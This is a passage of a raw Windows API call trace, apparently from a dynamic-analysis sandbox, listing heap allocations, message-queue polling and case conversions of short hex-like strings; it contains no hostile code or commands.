[0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.797] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.797] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0087.797] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0087.797] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.797] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0087.797] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.797] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.798] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.798] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.798] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.798] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0087.798] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0087.798] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.798] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0087.798] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.798] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.798] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.798] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0087.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0087.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0087.799] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0087.799] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0087.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.799] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0087.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.800] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0087.800] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.800] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0087.800] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.800] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.800] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.800] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.800] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.800] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.800] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.801] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.801] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.801] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0087.801] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.801] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0087.801] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.801] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.801] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.801] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0087.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0087.802] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.802] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.802] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.802] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.802] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.802] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0087.802] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.802] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0087.803] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.803] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.803] HeapFree (in: 